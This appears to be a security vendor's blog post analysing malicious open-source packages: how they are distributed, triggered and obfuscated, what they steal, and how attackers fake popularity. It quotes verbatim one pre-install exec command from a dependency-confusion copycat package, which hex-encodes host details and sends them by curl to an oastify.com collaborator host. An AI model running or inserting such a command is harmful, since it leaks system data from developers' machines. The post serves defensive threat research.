In the previous episode, Open Source Malicious Packages: The Problem, we discussed why the threat actors were so enthusiastic about publishing new malicious components or injecting malware in the latest versions of existing components: The open source infrastructure allows anyone anywhere to create an ephemeral account in a component registry (like NPM, PyPI, Docker Hub or Visual Studio Marketplace) or collaborative development platform (like GitHub). Zero cost, and many opportunities for leveraging the excess trust that software teams traditionally have on third-party components.
The asymmetry between how easy it is for attackers to distribute malware using the infrastructure available for open source, and how hard it is for organizations developing software (everyone?) to avoid getting infected with malware (and to deliver malware in the software they distribute for others), led to the quarter-million mark of malicious packages almost reached last year.
This is a problem of such magnitude that no single organization can solve it, and the community is in the process of reframing the open source process concerning trust, secure-by-default and secure-by-design principles, and the lifecycle of components. We will take a look at such ideas in the next episode Protecting Against Open Source Malicious Packages: What Does (Not) Work.
Remember that we are talking about software components that most of the time correspond to software packages: reusable components packed so they could be referenced as a dependency in a software manifest, and installed with a package manager or build tool. Please note that this case could be expanded to include public container images (used by container runtimes and orchestration platforms like Kubernetes), and extensions to software tools (for building, automation, and deployment).
Here we analyze how this attack tactic based on malicious components works, according to past examples and what we have seen in our platform for Malware Early Warning (MEW). We will dissect malicious components in different dimensions:
(1) the way chosen for distribution (registry used, in a new or existing component, and the technique used for infecting the component version published), (2) how the malware is activated or triggered, (3) the malicious behavior i.e. what harmful actions are observed and which is the motivation of the attacker, (4) which techniques are common for obfuscation, hiding for going unnoticed, lateral movement, communication with command and control (C2) hosts, etc.; and (5) the techniques for gaining enough popularity and trust so the victims end up installing the component.
The Distribution Mechanism Chosen
We observe a “background noise” of unsophisticated malicious packages using typosquatting to phish unwary developers with a typo in the package name for their dependency. Many popular packages receive a barrage of similarly named packages with typos, with the expectation that they will phish some unwary developers.
They use an ephemeral account, publish a group of typosquat packages, create another, and publish another group… Using some automation and ingenuity they can get some sophistication, but typically they are rather trivial. We internally call them “anchovies”. Credentials stealing is the main goal, but occasionally we find spyware exfiltrating source code or sensitive data like personally identifiable information (PII), clipboard capture, and other misgivings.
Coming out of the blue we see more sophisticated malicious components, the “sharks”. A minority are targeted to specific groups or organizations, typically with crypto drainers or web skimmers that are activated conditionally, perhaps following the approach seen in the event-stream incident of decrypting the attack payload only when the package is referenced from a target package.
The distribution mechanism was analyzed in the excellent and now classic paper, “Backstabber’s Knife Collection: A Review of Open Source Software Supply Chain Attacks”, which is a must-read. Surely you have seen this nice chart before:
All avenues were explored, including new and existing packages; affecting the source code, the build system, or the packaged component itself; using stolen credentials or social engineering; hijacking abandoned accounts and repositories or poisoning maintained ones. Some attacks received names (Typosquatting, Dependency Confusion, Manifest Confusion, Repo-jacking. etc.) and were already discussed elsewhere.
What about the registries chosen?
NPM continues to lead in the total number of malicious packages, but we saw a spike starting this year on PyPI. Python is a popular ecosystem for data science and machine learning. In fact, the malware density is now higher in PyPI than in NPM.
How the malware is triggered
Malicious packages are triggered during installation in only 4 out of 10 cases (in recent years it was close to 6 out of 10). The rest runs malicious behavior at runtime, with 1 out of 100 triggered while running tests. The adversaries seem to know that uncontrolled execution of installation scripts was disabled in many places.
What are the bad guys getting?
We will list the malicious behavior categories, with the most popular first. Please note that impact could be quite different: a wiper is stubbornly destructive, but it is not common and was seen only in a few cases, related to targeted cyber war campaigns or brutal hacktivism. The following categories are pretty common:
- InfoStealer / Credentials Drainer. By far the most frequent, over 90% of the unsophisticated attacks are simple stealers mainly looking for credentials like passwords, access tokens, API keys, and private keys (for SSH and the like). It is probably the simplest to write (along with wipers?). They enumerate known files/directories and other sources (e.g. registry keys), package the contents, and send that data to a C2 server. The idea is simple: “I publish a stealer for phishing credentials, so I can later use the credentials for launching a directed attack”.
The C2 networking observed is typically cheap-and-dirty, like Telegram channels or ngrok-like tunneling tools (often in the form of reverse proxies exposed through VPN egress IPs). There are hundreds (!) of possibilities, with many GitHub projects under the password-stealer topic. Specializations like keyloggers are rare for malicious packages and container images, but more frequent in tool extensions, where user interaction is expected.
- Dropper / Downloader. The second in popularity, typically coming first in multi-stage attacks. More than one in three of malicious components have droppers (if the malicious payload comes included within the package) or downloaders (the payload is downloaded from an endpoint under the control of the attacker). The payload is often a known binary malware variant, and it is run and sometimes persisted, for installing backdoors, spyware, crypto drainers, and other use cases. The payload downloaded or deployed starts a second-phase attack with all the power provided by existing malware binaries. The binaries can be distributed within the package, often masqueraded as images or supposedly innocuous file types, to avoid detection while connecting to unexpected sites.
- Cryptocurrency Stealers / Miners. Financially motivated adversaries are willing to use your cloud assets for running cryptominers (they even detect if they are running in a cloud VM). They do not care about the low-profit ratio of $1 for every $53 charged to the victim for the stolen cloud infrastructure. Victims may not be aware of this until they receive an unexpected bill. Fortunately, this comes and goes. Cryptojacking campaigns in malicious packages occasionally pop up and then fade away, phishing for wallet users or eventually targeting the wallet provider, as in the Ledger attack.
Other behaviors, like deploying a backdoor for remote code execution by opening a reverse shell is less frequent now than in the past. For example, the 123rf_contributor_web package (now removed from the registry) opens without any obfuscation a reverse shell copied and pasted from the Reverse Shell Cheat Sheet:
In addition to legitimate and malicious components, we have observed several abuses, including:
Spam packages
There are thousands of small packages, mostly in NPM, with no malware but promising easy earnings, snake oil, links to Viagra offerings, and all that. A few users publish such spam and take a lot of bandwidth from the registry. Another actor(s) possibly from Indonesia tried to extract benefit by abusing the teaRank intended for compensating open-source developers, by creating tens of thousands of interrelated NPM packages with related GitHub dummy repositories. This is a clear violation of the terms of use.
Bug bounty and security research hoaxes
When a package describes itself as exfiltrating data for good purposes, like detecting security flaws for bug bounty programs or researching certain aspects of the ecosystem. We have seen thousands of packages in this category, which fetch identification but not too sensitive data to a Burp Collaborator address from PortSwigger (e.g. host in oastify.com domain). We observed often copycats of the Dependency Confusion proof-of-concept by Alex Birsan, like the aurora-webmail-pro package (removed from the registry), which simply run this nasty code in the pre-install script:
exec("a=$(hostname; pwd; whoami; echo 'aurora-webmail-pro'; curl http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/;) && echo $a | xxd -p | head | while read ut; do curl -k -i -s http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/$ut;done")
And also included a “This is Simple Dependency Confusion Attack Proof of Concept” disclaimer description in the package.json. This is a clear violation of the terms of service, even without malicious intent.
Some good news? We have not seen (yet) ransomware attacks delivered through malicious components. For unknown reasons, cybercriminals seem to prefer more traditional email phishing, RDP-based, and drive-by download delivery mechanisms.
Additional Techniques Observed
Many techniques were used for persistence, defense evasion, information collection, communication with command & control hosts, and exfiltration.
Persistence in malicious components is gained using the persistence features in a second-stage binary malware, but sometimes the behavior is located in the package code, with scheduled tasks and changes in the Windows registry the most common.
Obfuscation is common, but unsophisticated. Most typosquatting packages (remember the “anchovies”?) do not use obfuscation at all; many use either trivial ones (base64/hex encoding or substitution ciphers like rot13) or use available code obfuscators and minification, which is easily reversed with the right tooling. Only the “sharks” do real, hard-core, obfuscation, hard to reverse-engineer.
Obfuscation may hide the attack, but why would code in an open-source component need to be obfuscated? Is there evidence that something needs to be hidden from plain sight? We have found many instances of non-malicious packages that use obfuscation to protect intellectual property, which is contradictory to “open source”. Obfuscation can be used as evidence of malware, but it’s not conclusive. It’s also difficult to de-obfuscate.
Evasion from defense controls adopts simple techniques. Malicious code is often protected in try … catch blocks that ignore any exceptions, so abnormal activity is not shown in the logs. Verification of the environment (running in a VM or container) is rare, unless for malware targeting a particular organization or environment.
Masquerading binaries in images and PDF files (sort of steganography) was another technique seen to evade detection.
As the most common malicious components are infostealers, data collection is essential. Secrets (passwords, access tokens, API keys, cryptographic keys) are routinely scanned in log files, environment variables, and even the clipboard (seen with banking trojans and crypto stealers). Source code exfiltration is also common, as the package installation is often done in a development node where internal git repositories might be cloned. We have seen packages enumerating directories in search of git repositories. Looking for locations like .env, private.pem, settings.py, app.js, or application.properties is quite common.
Exfiltration is another widely deployed action. Only a minority of malicious packages even try to hide the destination of the extracted data. Telegram channels and ngrok-like tunnels are often used. And there are many typically whitelisted domains used for exfiltration.
Other techniques, like privilege escalation or lateral movement, were less common.
Gaining Popularity and Trust
Imagine a tech crook with a ready-made killer malicious thing wondering: “How do I make this piece of s#$! trustworthy to those unsuspecting morons?“.
That translates into how to make the entry for the malicious component to show many stars / forks (for popularity), plus versions / issues and pull requests (for activity). The idea is to gain fictitious popularity (stars) and dependents, and a convincing look regarding relevance and maintenance.
The registry does not check if the contents in a GitHub project and the package contents match. This is a well-known issue in the software supply chain. The public registries are giant sinkholes that swallow everything thrown at them. You can link any repository.
If the malicious package typo-squats a popular one, that’s easy: just reference the existing GitHub repository in the dependencies manifest used for creating the package and publishing it into the registry. For new packages on a fake GitHub repo, you may need more ingenuity, perhaps creating fake stargazing/forking GitHub accounts via scripting.
And if the contents of your package are reasonably similar to the repo, slip a couple of well-designed changes here and there… You can inject your malware into a new package resembling a popular one referencing the existing one’s repository, and wait for the typos. If anyone dares to compare the contents of the package tarball with the contents from the GitHub repository, the differences at the malware injection points could be easily missed. We have seen this approach many times before.
A mechanism for a component to make a tamper-proof statement about provenance, how the package was built, from what sources, and by whom, would be welcome. But that is another story.
Is component X malware?
Is there a (comprehensive) database of malicious packages? Nope. Open-source vulnerabilities have a CVE ID assigned, but only a few malicious packages (particularly the ones that make headlines) are given one. The CWE for malicious packages is CWE-506 (embedded malicious code).
The usual malware tools (VirusTotal, MalwareBazaar, SOREL-20M…) do not make specific provisions for malicious components. That would be welcome!
There are research sample databases and datasets for analysis (we use a few of them), but entries are updated only when the malicious package is known, which is often too late. If you are interested, the OpenSSF Malicious Packages is a nice start.
In the next post, we will discuss how to know if a given package is malicious. Spoiler: yes, there are ways of checking for malicious components early during the exposure window, before the registry removes a known malicious component.
Further reading
In the next episode “Protecting Against Open Source Malicious Packages: What Does (Not) Work” we will discuss the do’s and don’ts for open-source security. Most security-aware professionals have intuitions about how to handle this threat, but misconceptions abound.
We will review why these ideas are wrong, and how such misconceptions are contributing to the popularity of this attack mechanism, and to the overwhelming risk that organizations are experiencing. We will proceed then with what does work, and which is the effort and resources involved.
Also, we are going to post about the evolution of malicious packages in terms of their intent, injection mechanism, and attack techniques.
Stay tuned!